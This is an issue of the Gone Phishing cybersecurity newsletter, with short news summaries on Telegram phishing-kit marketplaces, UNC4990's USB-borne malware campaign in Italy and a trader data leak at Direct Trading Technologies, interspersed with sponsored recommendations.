Phishing Alert: Telegram Transforms into Cybercrime Hub

Feb 01 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s giving you more hope than the Fed with rate cuts ๐Ÿ’€๐Ÿ’€๐Ÿ’€

Todayโ€™s hottest cybersecurity news stories:

  • ๐ŸŽบ And the Telegrammy goes to hackers w/ their DIY kits ๐Ÿ”จ

  • ๐Ÿ• Italian suffer cheesy crypto hack attacks via USB attacksย ๐Ÿ’พ

  • ๐Ÿ˜ณ Itโ€™s a data leak anthology of Direct Trading Technologies ๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ปs ๐Ÿ‘Š

DIY hack and pry ๐Ÿ‘€

 

giphy.com

 

๐Ÿ” Phishing Alert: Telegram Transforms into Cybercrime Hub! ๐Ÿšจ

๐Ÿ“ข Cybersecurity researchers from Guardio Labs have uncovered a concerning trend in the world of cybercrimeโ€”the “democratisation” of the phishing ecosystem through Telegram. This messaging app, priced as low as $230, has become a thriving hub for cybercriminals, allowing both seasoned and novice actors to exchange tools and insights, creating a dark supply chain.

๐ŸŒ The once-invite-only dark web activities are now easily accessible on public Telegram channels, exposing aspiring cybercriminals to malicious tools and tactics. Guardio Labs warns of the ease with which phishing campaigns can be constructed using affordable tools and kits available on the platform.

๐Ÿ“… In April 2023, Kaspersky reported on Telegram channels educating newcomers about phishing, offering automated bots like Telekopye for large-scale scams. Guardio Labs emphasises the dual responsibility of website owners to protect against scammers exploiting their platforms for phishing operations.

๐Ÿ“ง Digital marketplaces on Telegram provide “letters”โ€”expertly designed email templatesโ€”enhancing the authenticity of phishing campaigns. Additionally, bulk datasets or “leads” with personal information are available to maximise attack effectiveness.

๐Ÿ’ฐ These phishing campaigns aim to monetize stolen credentials by selling them as “logs,” yielding a significant return on investment. Social media credentials sell for as little as a dollar, while banking details can fetch hundreds.

๐Ÿ›ก๏ธ Guardio Labs underscores the alarming accessibility of cybercrime, urging vigilance and protection against unwitting involvement in phishing operations. Stay informed, stay secure! ๐Ÿ”’๐Ÿ”๐ŸŒ๐Ÿšซ

 

Signup for Free

 

Learn AI in 5 minutes a day. We’ll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

USB TBD TCA BTW ๐Ÿ˜

๐Ÿšจ Alert: UNC4990 Targets Italian Organisations with USB Attacks! ๐Ÿ’ป

๐ŸŒ Mandiant, a subsidiary of Google, has identified a financially motivated threat actor, UNC4990, utilising weaponized USB devices to infiltrate organisations in Italy. This threat spans various sectors, including health, transportation, construction, and logistics.

๐Ÿ” UNC4990’s modus operandi involves widespread USB infections, deploying the EMPTYSPACE downloader. The attacks leverage third-party websites such as GitHub, Vimeo, and Ars Technica to host encoded stages, downloaded and decoded via PowerShell in the execution chain.

๐Ÿ“† Active since late 2020, UNC4990 predominantly operates from Italy, utilising Italian infrastructure for command-and-control (C2) functions. The end goal remains unclear, though instances of deploying an open-source cryptocurrency miner have been reported after prolonged beaconing activity.

๐Ÿ›ก๏ธ The infection initiates with a victim clicking on a malicious LNK shortcut file on a USB device, triggering a PowerShell script to download EMPTYSPACE from a remote server. Yoroi identifies four EMPTYSPACE variants (Golang, .NET, Node.js, Python), acting as conduits for fetching next-stage payloads from the C2 server, including the QUIETBOARD backdoor.

๐Ÿ‘พ QUIETBOARD, a Python-based backdoor, exhibits versatile capabilities, executing commands, altering crypto wallet addresses, spreading through removable drives, taking screenshots, and gathering system information. Notably, UNC4990 utilises popular sites like Ars Technica and GitHub for hosting malicious payloads.

๐Ÿšซ While content hosted on these services poses no direct risk to users, vigilance is crucial. UNC4990’s modular approach, using multiple programming languages, suggests adaptability and experimentation, posing a persistent threat.

๐Ÿ”’ Stay informed, enhance security measures! ๐ŸŒ๐Ÿ”

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

๐Ÿƒย The Motley Fool: โ€œFool me once, shame on โ€” shame on you. Fool me โ€” you can’t get fooled again.โ€ Good olโ€™ George Dubya ๐Ÿ˜‚ Let us tell whoโ€™s not fooling around though; thatโ€™s the Crรผe ๐Ÿ‘€ at Motley Fool. Youโ€™d be a fool (alright, enough already! ๐Ÿ™ˆ) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! ๐Ÿ› Kidding aside, if you check out their website theyโ€™ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets ๐Ÿค‘ย (LINK)


๐Ÿšตย Wander: Find your happy place. Cue Happy Gilmore flashback ๐ŸŒ๏ธโ›ณ๐ŸŒˆ๐Ÿ•Š๏ธ Mmmm Happy Placeโ€ฆ ๐Ÿ˜‡ So, weโ€™ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, itโ€™s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels sets Wander apart from your run of the mill American getaway ๐Ÿž๏ธ๐Ÿ˜ย (LINK)


๐ŸŒŠย Digital Ocean: If you build it they will come. Nope, weโ€™re not talking about a baseball field for ghosts โšพ๐Ÿ‘ป๐Ÿฟ (Great movie, to be fair ๐Ÿ™ˆ). This is the Digital Ocean whoโ€™ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website youโ€™ll find yourself catching the buzz even if you canโ€™t code (guilty ๐Ÿ˜‘). But if you can and youโ€™re looking for somewhere to test things out or launch something new or simply enhance what youโ€™ve got, weโ€™d recommend checking out their services foโ€™ sho ๐Ÿ˜‰ And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! ๐ŸŒฟย (LINK)

You better Fintech yourself before you wreck yoโ€™ self ๐ŸŽค๐ŸŽต๐Ÿ”ฅ

๐Ÿšจ Security Breach Alert: Fintech Firm Leaks Data of 300K+ Traders! ๐Ÿ’ณ

๐Ÿ“ข International fintech company Direct Trading Technologies (DTT) is under scrutiny as it inadvertently exposed the sensitive data and trading activity of over 300,000 traders, putting them at risk of account takeovers. Discovered by Cybernews on October 27th, a misconfigured web server belonging to DTT contained backups and development code references.

๐ŸŒ DTT, operating globally with a focus on Saudi Arabia, offers trading platforms for various assets, including stocks, forex, metals, energies, indices, CFDs, and cryptocurrencies. The leaked directory included database backups with extensive information on users, posing risks from identity theft to account manipulation.

๐Ÿ’ป Leaked Data Highlights:

  • Trading activity of 300K+ users over six years

  • Names, email addresses, and IP addresses

  • ย Exposed passwords for users with DTT email addresses

  • ย Home addresses, phone numbers, and partial credit card details

  • Hashed passwords for DTT trading platform access

  • KYC document storage locations and metadata (documents not exposed)

  • Database credentials and white-label customer details in plaintext

๐Ÿ” Cybernews promptly notified DTT, and while the issue was resolved, an official response is pending. The leaked information, including internal comments from the outreach team, raises concerns about potential financial account takeovers.

๐Ÿ“‰ This breach underscores the urgency for robust cybersecurity in the rapidly growing fintech industry. Traders, holding accounts with substantial value, become prime targets for threat actors. Stay vigilant and informed to protect your financial data! ๐ŸŒ๐Ÿ”’

Thatโ€™s all for today, cyber tigers ๐Ÿฏ

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran ‘Wealthy Primate’ might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think!

So long and thanks for reading all the phish!

Recent articles